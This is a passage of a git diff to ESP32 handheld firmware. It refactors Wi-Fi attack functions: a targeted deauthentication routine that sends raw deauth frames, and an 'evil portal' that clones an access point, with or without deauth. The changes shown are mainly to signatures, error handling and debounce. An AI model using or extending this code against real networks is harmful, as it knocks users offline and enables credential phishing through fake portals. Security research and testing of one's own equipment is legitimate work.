channel); }}, - {"Clone Portal", [=]() { startEvilPortal(tssid, bssid, channel,false); }}, - {"Deauth+Clone", [=]() { startEvilPortal(tssid, bssid, channel,true); }}, + {"Information", [=]() { wifi_atk_info(tssid, mac, channel); }}, + {"Deauth", [=]() { target_atk(tssid, mac, channel); }}, + {"Clone Portal", [=]() { startEvilPortal(tssid, channel,false); }}, + {"Deauth+Clone", [=]() { startEvilPortal(tssid, channel,true); }}, {"Main Menu", [=]() { backToMenu(); }}, }; @@ -139,13 +147,16 @@ void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { ** function: target_atk ** @brief: Deploy Target deauth ***************************************************************************************/ -void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void target_atk(String tssid,String mac, uint8_t channel) { Serial.begin(115200); - //criar o frame - memcpy(ap_record.bssid, bssid, 6); + WiFi.mode(WIFI_AP); - WiFi.softAP(tssid, emptyString, channel, 1, 4, false); + if(!WiFi.softAP(tssid, emptyString, channel, 1, 4, false)) { + displayError("Falha 1"); + while(!checkSelPress()) { yield(); } + } wifiConnected=true; + memcpy(deauth_frame, deauth_frame_default, sizeof(deauth_frame_default)); wsl_bypasser_send_raw_frame(&ap_record,channel); //loop com o ataque mostrando o numero de frames por segundo @@ -155,6 +166,12 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { bool redraw = true; delay(200); checkSelPress(); + + + + + + drawMainMenu(); while(1) { if(redraw) { //desenhar a tela @@ -185,7 +202,7 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { //Pause attack if(checkSelPress()) { displayRedStripe("Deauth Paused",TFT_WHITE,FGCOLOR); - while(checkSelPress()) { yield(); } // timeless debounce + while(checkSelPress()) { delay(50); } // timeless debounce // wait to restart or kick out of the function while(!checkSelPress()) { #ifndef CARDPUTER @@ -194,8 +211,9 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { Keyboard.update(); if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer #endif - } - while(checkSelPress()) { yield(); } // timeless debounce + } + while(checkSelPress()) { delay(50); } // timeless debounce + redraw=true; } // Checks para sair do while #ifndef CARDPUTER @@ -205,6 +223,7 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer #endif } + wifiDisconnect(); returnToMenu=true; } diff --git a/src/wifi_atks.h b/src/wifi_atks.h index adabf6440..4098c5b62 100644 --- a/src/wifi_atks.h +++ b/src/wifi_atks.h @@ -25,10 +25,10 @@ void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size); */ void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan); -void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel); +void wifi_atk_info(String tssid,String mac, uint8_t channel); void wifi_atk_menu(); -void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel); +void target_atk_menu(String tssid,String mac, uint8_t channel); -void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel); \ No newline at end of file +void target_atk(String tssid,String mac, uint8_t channel); \ No newline at end of file